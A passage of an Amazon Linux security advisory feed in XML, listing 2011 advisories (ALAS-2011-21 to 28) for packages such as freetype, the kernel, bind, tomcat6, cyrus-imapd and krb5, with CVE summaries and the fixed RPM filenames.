date="2014-09-14 14:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3439:
Multiple input validation flaws were found in the way FreeType processed CID-keyed fonts. If a specially-crafted font file was loaded by an application linked against FreeType, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
FreeType in CoreGraphics in Apple iOS before 5.0.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted font in a document.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3439" title="" id="CVE-2011-3439" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1455.html" title="" id="RHSA-2011:1455" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="freetype-demos" version="2.3.11" release="6.11.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-6.11.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.11.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-6.11.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.11.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-6.11.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="6.11.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-6.11.amzn1.i686.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="6.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-6.11.amzn1.x86_64.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="6.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-6.11.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="6.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-6.11.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="6.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-6.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-21</id><title>Amazon Linux - ALAS-2011-21: medium priority package update for nss</title><issued date="2011-11-19 01:21:00" /><updated date="2014-09-14 14:43:00" /><severity>medium</severity><description /><references><reference href="https://rhn.redhat.com/errata/RHSA-2011:1444.html" title="" id="RHSA-2011:1444" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nss-debuginfo" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.12.10" release="2.23.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.12.10-2.23.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.12.10-2.23.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.12.10" release="2.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.12.10-2.23.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-22</id><title>Amazon Linux - ALAS-2011-22: medium priority package update for kernel</title><issued date="2011-11-19 01:22:00" /><updated date="2014-09-14 14:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4081:
* Flaws in ghash_update() and ghash_final() could allow a local, unprivileged user to cause a denial of service.
CVE-2011-4077:
* A buffer overflow flaw was found in the way the Linux kernel's XFS file system implementation handled links with overly long path names. A local, unprivileged user could use this flaw to cause a denial of service or escalate their privileges by mounting a specially-crafted disk.
CVE-2011-1083:
The epoll implementation in the Linux kernel 2.6.37.2 and earlier does not properly traverse a tree of epoll file descriptors, which allows local users to cause a denial of service (CPU consumption) via a crafted application that makes epoll_create and epoll_ctl system calls.
* A flaw was found in the way the Linux kernel's Event Poll (epoll) subsystem handled large, nested epoll structures. A local, unprivileged user could use this flaw to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1083" title="" id="CVE-2011-1083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4077" title="" id="CVE-2011-4077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4081" title="" id="CVE-2011-4081" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-103.47.amzn1.noarch.rpm</filename></package><package name="perf" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-103.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="kernel" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="103.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-103.47.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-23</id><title>Amazon Linux - ALAS-2011-23: important priority package update for cacti</title><issued date="2011-11-30 21:57:00" /><updated date="2014-09-14 15:03:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cacti" version="0.8.7h" release="1.2.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.7h-1.2.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-24</id><title>Amazon Linux - ALAS-2011-24: important priority package update for bind</title><issued date="2011-11-30 21:59:00" /><updated date="2014-09-14 15:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4313:
query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
A flaw was discovered in the way BIND handled certain DNS queries, which caused it to cache an invalid record. A remote attacker could use this flaw to send repeated queries for this invalid record, causing the resolvers to exit unexpectedly due to a failed assertion.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4313" title="" id="CVE-2011-4313" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1458.html" title="" id="RHSA-2011:1458" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.7.3" release="2.11.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.7.3-2.11.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.7.3-2.11.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.7.3" release="2.11.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.7.3-2.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-25</id><title>Amazon Linux - ALAS-2011-25: important priority package update for tomcat6</title><issued date="2011-12-02 22:21:00" /><updated date="2014-09-14 15:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3190:
Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
A flaw was found in the way the Coyote (org.apache.coyote.ajp.AjpProcessor) and APR (org.apache.coyote.ajp.AjpAprProcessor) Tomcat AJP (Apache JServ Protocol) connectors processed certain POST requests. An attacker could send a specially-crafted request that would cause the connector to treat the message body as a new request. This allows arbitrary AJP messages to be injected, possibly allowing an attacker to bypass a web application's authentication checks and gain access to information they would otherwise be unable to access. The JK (org.apache.jk.server.JkCoyoteHandler) connector is used by default when the APR libraries are not present. The JK connector is not affected by this flaw.
CVE-2011-2204:
Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
A flaw was found in the Tomcat MemoryUserDatabase. If a runtime exception occurred when creating a new user with a JMX client, that user's password was logged to Tomcat log files. Note: By default, only administrators have access to such log files.
CVE-2011-1184:
The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
Multiple flaws were found in the way Tomcat handled HTTP DIGEST authentication. These flaws weakened the Tomcat HTTP DIGEST authentication implementation, subjecting it to some of the weaknesses of HTTP BASIC authentication, for example, allowing remote attackers to perform session replay attacks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1184" title="" id="CVE-2011-1184" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2204" title="" id="CVE-2011-2204" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3190" title="" id="CVE-2011-3190" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="tomcat6-el-2.1-api" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.33-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.33" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.33-1.26.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-26</id><title>Amazon Linux - ALAS-2011-26: medium priority package update for kernel</title><issued date="2011-12-02 22:23:00" /><updated date="2014-09-14 15:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4326:
* A flaw was found in the way the Linux kernel handled fragmented IPv6 UDP datagrams over the bridge with UDP Fragmentation Offload (UFO) functionality on. A remote attacker could use this flaw to cause a denial of service.
CVE-2011-4132:
* A flaw was found in the Linux kernel's Journaling Block Device (JBD). A local, unprivileged user could use this flaw to crash the system by mounting a specially-crafted ext3 or ext4 disk.
* A flaw was found in the Linux kernel's Journaling Block Device (JBD). A local attacker could use this flaw to crash the system by mounting a specially-crafted ext3 or ext4 disk.
CVE-2011-4110:
* A NULL pointer dereference flaw was found in the way the Linux kernel's key management facility handled user-defined key types. A local, unprivileged user could use the keyctl utility to cause a denial of service.
CVE-2011-3593:
* A flaw was found in the way the Linux kernel handled VLAN 0 frames with the priority tag set. When using certain network drivers, an attacker on the local network could use this flaw to cause a denial of service.
CVE-2011-3363:
* A flaw was found in the way CIFS shares with DFS referrals at their root were handled. An attacker on the local network who is able to deploy a malicious CIFS server could create a CIFS network share that, when mounted, would cause the client system to crash.
* A flaw was found in the way CIFS (Common Internet File System) shares with DFS referrals at their root were handled. An attacker on the local network who is able to deploy a malicious CIFS server could create a CIFS network share that, when mounted, would cause the client system to crash.
CVE-2011-3359:
* A flaw was found in the b43 driver in the Linux kernel. If a system had an active wireless interface that uses the b43 driver, an attacker able to send a specially-crafted frame to that interface could cause a denial of service.
CVE-2011-3353:
* A buffer overflow flaw was found in the Linux kernel's FUSE (Filesystem in Userspace) implementation. A local user in the fuse group who has access to mount a FUSE file system could use this flaw to cause a denial of service.
CVE-2011-3191:
* A signedness issue was found in the Linux kernel's CIFS (Common Internet File System) implementation. A malicious CIFS server could send a specially-crafted response to a directory read request that would result in a denial of service or privilege escalation on a system that has a CIFS share mounted.
* A malicious CIFS (Common Internet File System) server could send a specially-crafted response to a directory read request that would result in a denial of service or privilege escalation on a system that has a CIFS share mounted.
CVE-2011-3188:
* The way IPv4 and IPv6 protocol sequence numbers and fragment IDs were generated could allow a man-in-the-middle attacker to inject packets and possibly hijack connections. Protocol sequence numbers and fragment IDs are now more random.
* IPv4 and IPv6 protocol sequence number and fragment ID generation could allow a man-in-the-middle attacker to inject packets and possibly hijack connections. Protocol sequence number and fragment IDs are now more random.
CVE-2011-2905:
* It was found that the perf tool, a part of the Linux kernel's Performance Events implementation, could load its configuration file from the current working directory. If a local user with access to the perf tool were tricked into running perf in a directory that contains a specially-crafted configuration file, it could cause perf to overwrite arbitrary files and directories accessible to that user.
CVE-2011-2699:
* IPv6 fragment identification value generation could allow a remote attacker to disrupt a target system's networking, preventing legitimate users from accessing its services.
CVE-2011-2494:
* The I/O statistics from the taskstats subsystem could be read without any restrictions. A local, unprivileged user could use this flaw to gather confidential information, such as the length of a password used in a process.
CVE-2011-1577:
Heap-based buffer overflow in the is_gpt_valid function in fs/partitions/efi.c in the Linux kernel 2.6.38 and earlier allows physically proximate attackers to cause a denial of service (OOPS) or possibly have unspecified other impact via a crafted size of the EFI GUID partition-table header on removable media.
* A heap overflow flaw was found in the Linux kernel's EFI GUID Partition Table (GPT) implementation. A local attacker could use this flaw to cause a denial of service by mounting a disk that contains specially-crafted partition tables.
* A heap overflow flaw in the Linux kernel's EFI GUID Partition Table (GPT) implementation could allow a local attacker to cause a denial of service by mounting a disk that contains specially-crafted partition tables.
CVE-2011-1162:
* A flaw in the way memory containing security-related data was handled in tpm_read() could allow a local, unprivileged user to read the results of a previously run TPM command.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1162" title="" id="CVE-2011-1162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577" title="" id="CVE-2011-1577" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2494" title="" id="CVE-2011-2494" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2699" title="" id="CVE-2011-2699" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2905" title="" id="CVE-2011-2905" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3188" title="" id="CVE-2011-3188" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3191" title="" id="CVE-2011-3191" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3353" title="" id="CVE-2011-3353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3359" title="" id="CVE-2011-3359" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3363" title="" id="CVE-2011-3363" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3593" title="" id="CVE-2011-3593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4110" title="" id="CVE-2011-4110" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4132" title="" id="CVE-2011-4132" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4326" title="" id="CVE-2011-4326" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1465.html" title="" id="RHSA-2011:1465" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-106.49.amzn1.noarch.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-106.49.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="kernel" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="106.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-106.49.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-27</id><title>Amazon Linux - ALAS-2011-27: medium priority package update for cyrus-imapd</title><issued date="2011-12-09 11:17:00" /><updated date="2014-09-14 15:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3481:
The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
A NULL pointer dereference flaw was found in the cyrus-imapd IMAP server, imapd. A remote attacker could send a specially-crafted mail message to a victim that would possibly prevent them from accessing their mail normally, if they were using an IMAP client that relies on the server threading IMAP feature.
CVE-2011-3372:
imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
An authentication bypass flaw was found in the cyrus-imapd NNTP server, nntpd. A remote user able to use the nntpd service could use this flaw to read or post newsgroup messages on an NNTP server configured to require user authentication, without providing valid authentication credentials.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3372" title="" id="CVE-2011-3372" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3481" title="" id="CVE-2011-3481" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1508.html" title="" id="RHSA-2011:1508" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cyrus-imapd" version="2.3.16" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-2.3.16-6.5.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-devel" version="2.3.16" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-devel-2.3.16-6.5.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-utils" version="2.3.16" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-utils-2.3.16-6.5.amzn1.i686.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.3.16" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/cyrus-imapd-debuginfo-2.3.16-6.5.amzn1.i686.rpm</filename></package><package name="cyrus-imapd" version="2.3.16" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-2.3.16-6.5.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-utils" version="2.3.16" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-utils-2.3.16-6.5.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-devel" version="2.3.16" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-devel-2.3.16-6.5.amzn1.x86_64.rpm</filename></package><package name="cyrus-imapd-debuginfo" version="2.3.16" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/cyrus-imapd-debuginfo-2.3.16-6.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-28</id><title>Amazon Linux - ALAS-2011-28: medium priority package update for krb5</title><issued date="2011-12-09 16:12:00" /><updated date="2014-09-14 15:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-1530:
The process_tgs_req function in do_tgs_req.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.9 through 1.9.2 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted TGS request that triggers an error other than the KRB5_KDB_NOENTRY error.
A NULL pointer dereference flaw was found in the way the MIT Kerberos KDC processed certain TGS (Ticket-granting Server) requests. A remote, authenticated attacker could use this flaw to crash the KDC via a specially-crafted TGS request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1530" title="" id="CVE-2011-1530" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1790.html" title="" id="RHSA-2011:1790" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="krb5-server" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="22.20.amzn1" epoch="0" 